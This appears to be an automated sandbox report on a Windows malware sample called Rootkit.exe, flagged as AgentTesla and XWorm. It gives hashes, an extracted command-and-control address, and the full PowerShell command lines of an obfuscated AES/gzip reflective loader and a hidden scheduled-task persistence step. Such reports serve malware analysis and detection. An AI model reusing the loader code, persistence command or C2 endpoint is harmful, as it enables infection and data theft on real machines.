Analysis
-
max time kernel
1s -
max time network
34s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
30-06-2024 13:15
Static task
static1
General
-
Target
Rootkit.exe
-
Size
5.2MB
-
MD5
bb3ad62baa943e12858845f450b52d45
-
SHA1
106833ebedf630c67848569b953b58d734bfbc4f
-
SHA256
696493dcbdadaac33f562d957dcbdcad65993bbbdafa020dd910c797873ebb9d
-
SHA512
a84fb4ace43c878df83c39a8058dd336583ac81225760aad031b04e0039bfde356eae23af689f6e62030da4fd55690f29d80fbf5eaf1bc7cbeac47be559e987c
-
SSDEEP
98304:uIHjlOot0eJu8/Zh84XB5D3DPJNNlQwGPth3rhV6Po0gpFvjM:XpOodumZhjBVDBNN65tZ9BHr
Malware Config
Extracted
xworm
session-chief.gl.at.ply.gg:36125
-
Install_directory
%LocalAppData%
-
install_file
svchost.exe
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/4752-77-0x0000024C7F540000-0x0000024C7F556000-memory.dmp family_xworm -
AgentTesla payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/728-55-0x0000000005B10000-0x0000000005D24000-memory.dmp family_agenttesla -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 4396 powershell.exe 5104 powershell.exe 4752 powershell.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\SpyderCrypter.exe themida C:\Users\Admin\AppData\Local\SpyderCrypter.exe themida C:\Users\Admin\AppData\Local\SpyderCrypter.exe themida behavioral1/memory/728-38-0x0000000000290000-0x0000000000C9C000-memory.dmp themida behavioral1/memory/728-40-0x0000000000290000-0x0000000000C9C000-memory.dmp themida -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 24 ip-api.com
Processes
-
C:\Users\Admin\AppData\Local\Temp\Rootkit.exe"C:\Users\Admin\AppData\Local\Temp\Rootkit.exe"1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\svchost.bat" "2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4M5j+1xzJOeDcwzKdNYAVj5Z1u6Xszhz0dyCDDGdvuk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k68c/eR0Vk68JzYJXrGZ+w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tYTcJ=New-Object System.IO.MemoryStream(,$param_var); $GFzVH=New-Object System.IO.MemoryStream; $DkOtB=New-Object System.IO.Compression.GZipStream($tYTcJ, [IO.Compression.CompressionMode]::Decompress); $DkOtB.CopyTo($GFzVH); $DkOtB.Dispose(); $tYTcJ.Dispose(); $GFzVH.Dispose(); $GFzVH.ToArray();}function execute_function($param_var,$param2_var){ $cLKFK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bfXRs=$cLKFK.EntryPoint; $bfXRs.Invoke($null, $param2_var);}$eZMBn = 'C:\Users\Admin\AppData\Local\svchost.bat';$host.UI.RawUI.WindowTitle = $eZMBn;$iDiQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eZMBn).Split([Environment]::NewLine);foreach ($ICGWs in $iDiQu) { if ($ICGWs.StartsWith(':: ')) { $LaNhz=$ICGWs.Substring(3); break; }}$payloads_var=[string[]]$LaNhz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_44_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_44.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_44.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_44.bat" "5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4M5j+1xzJOeDcwzKdNYAVj5Z1u6Xszhz0dyCDDGdvuk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k68c/eR0Vk68JzYJXrGZ+w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tYTcJ=New-Object System.IO.MemoryStream(,$param_var); $GFzVH=New-Object System.IO.MemoryStream; $DkOtB=New-Object System.IO.Compression.GZipStream($tYTcJ, [IO.Compression.CompressionMode]::Decompress); $DkOtB.CopyTo($GFzVH); $DkOtB.Dispose(); $tYTcJ.Dispose(); $GFzVH.Dispose(); $GFzVH.ToArray();}function execute_function($param_var,$param2_var){ $cLKFK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $bfXRs=$cLKFK.EntryPoint; $bfXRs.Invoke($null, $param2_var);}$eZMBn = 'C:\Users\Admin\AppData\Roaming\startup_str_44.bat';$host.UI.RawUI.WindowTitle = $eZMBn;$iDiQu=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eZMBn).Split([Environment]::NewLine);foreach ($ICGWs in $iDiQu) { if ($ICGWs.StartsWith(':: ')) { $LaNhz=$ICGWs.Substring(3); break; }}$payloads_var=[string[]]$LaNhz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Users\Admin\AppData\Local\SpyderCrypter.exe"C:\Users\Admin\AppData\Local\SpyderCrypter.exe"2⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD53c2a00f0fd823b88bf228b8472979845
SHA15dcc2f4e9282bdeb5d9f1b4ff6e790b8636d1482
SHA256aaabc9856198107bc7a94bff5bcba1cd02e7adc24527e8794300e57ee7dd2ba4
SHA5127f90eedab256355659676eddfa504a6fb08f016c610166b4abbea5b0d6a94a1c834ebae011eefdd68e23df4558c3a72c33ef887de7d62d70ea179bbd8b01fce9
-
C:\Users\Admin\AppData\Local\SpyderCrypter.exeFilesize
1.7MB
MD56f469fbde4beccd5414d8cf074fbac5c
SHA19ddff8409b73a606265e2af867700a09fe8c6f29
SHA2564d4c79649623e2f1df7333fba0719e2bcab780b54195573f72e89b7f17d9745c
SHA512f3230224fe158693995cc74cd164731e77197562604a30feb4fe3ef86f6c770ea238d8012aabf4a61174aabd71a5001edb9a5338deb021cc599f5a85069cdfc4
-
C:\Users\Admin\AppData\Local\SpyderCrypter.exeFilesize
1.2MB
MD5d4f5ba2752470f66cd3fad4f3632ff80
SHA161d983b82ae81e1e1d974749a55736a52adbdf9a
SHA256e421f19253131c2f87221840dc4c3c88aa0a3d2e1a9b68b8fa015adb84afab9d
SHA51246557f35c34f2612fdac835aa3a6d56280a8f66783bc7424978bbca8513b20842bf9f8f9dc8fa7e18c79927eef21f1e6eb4a5d803669d8c6d8de0bcd969cea8c
-
C:\Users\Admin\AppData\Local\SpyderCrypter.exeFilesize
1.4MB
MD53519b16f3a49393c3d9ce298fe030ca5
SHA1d915e3788205e5c5d43cfc0287acb0b6cf19db89
SHA25628ddafd4a8e8cc5d5cde37ddf3f6239b4f2510cd1bd6e659cbb9cb841800abeb
SHA512088b3987bb93b761a2fd213eaf3c2f6e8da8ead1709e22747360506ee93e2e8fc10a4450ec02a31a575291cc11f43d5090cf4c0ba888243b2db01297998c228c
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o2idkmm4.fti.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\svchost.batFilesize
287KB
MD59be1452fccb6a9ca2b3e28b89d0c879e
SHA18fe95b338be85b1ceac233a51abf3c59890741a7
SHA256fa57646f828af97268c76a06db56ef3c7dbc6c87d8b3a49579783b346c1ef6b6
SHA512f2376350ff5e8b5c405c3e48370a22d140249c77a3c5b69f88e55c87f5f643f501a95f1dcf3e361619562ca4fdefa403caed95cb26bb6250c4a62a270803474f
-
C:\Users\Admin\AppData\Roaming\startup_str_44.vbsFilesize
114B
MD55618b50be7ed58e1ddf340dc9b0c8cec
SHA1a98e2497af8e110438d727f02e6a0375a378ad4c
SHA256a227ea8019965528a5e3b5a8b8f3ebb17cceaaa493ceb895a1285aa38455be11
SHA51231857325a9bb6713a6df044c4be291333ccefaa62b4edb4ba69d671c3c2de509143760b10ea84f1c8b121ec4723982f8941a95f5f413bbdc6a89dc8c15c108ca
-
memory/728-20-0x0000000077560000-0x0000000077650000-memory.dmpFilesize
960KB
-
memory/728-38-0x0000000000290000-0x0000000000C9C000-memory.dmpFilesize
10.0MB
-
memory/728-22-0x0000000077560000-0x0000000077650000-memory.dmpFilesize
960KB
-
memory/728-24-0x0000000077560000-0x0000000077650000-memory.dmpFilesize
960KB
-
memory/728-23-0x0000000077560000-0x0000000077650000-memory.dmpFilesize
960KB
-
memory/728-25-0x0000000077560000-0x0000000077650000-memory.dmpFilesize
960KB
-
memory/728-85-0x0000000077560000-0x0000000077650000-memory.dmpFilesize
960KB
-
memory/728-84-0x0000000077560000-0x0000000077650000-memory.dmpFilesize
960KB
-
memory/728-80-0x0000000077580000-0x0000000077581000-memory.dmpFilesize
4KB
-
memory/728-78-0x0000000000290000-0x0000000000C9C000-memory.dmpFilesize
10.0MB
-
memory/728-40-0x0000000000290000-0x0000000000C9C000-memory.dmpFilesize
10.0MB
-
memory/728-41-0x0000000005E10000-0x00000000063B4000-memory.dmpFilesize
5.6MB
-
memory/728-42-0x0000000005710000-0x00000000057A2000-memory.dmpFilesize
584KB
-
memory/728-21-0x0000000077560000-0x0000000077650000-memory.dmpFilesize
960KB
-
memory/728-54-0x00000000056B0000-0x00000000056BA000-memory.dmpFilesize
40KB
-
memory/728-55-0x0000000005B10000-0x0000000005D24000-memory.dmpFilesize
2.1MB
-
memory/728-19-0x0000000077580000-0x0000000077581000-memory.dmpFilesize
4KB
-
memory/728-17-0x0000000000290000-0x0000000000C9C000-memory.dmpFilesize
10.0MB
-
memory/728-79-0x0000000008820000-0x00000000088D0000-memory.dmpFilesize
704KB
-
memory/4396-43-0x000002227A440000-0x000002227A478000-memory.dmpFilesize
224KB
-
memory/4396-39-0x000002225F930000-0x000002225F938000-memory.dmpFilesize
32KB
-
memory/4396-33-0x000002227A1D0000-0x000002227A1F2000-memory.dmpFilesize
136KB
-
memory/4752-77-0x0000024C7F540000-0x0000024C7F556000-memory.dmpFilesize
88KB
-
memory/4820-1-0x00000000002A0000-0x00000000007D2000-memory.dmpFilesize
5.2MB
-
memory/4820-0-0x00007FFCE8BB3000-0x00007FFCE8BB5000-memory.dmpFilesize
8KB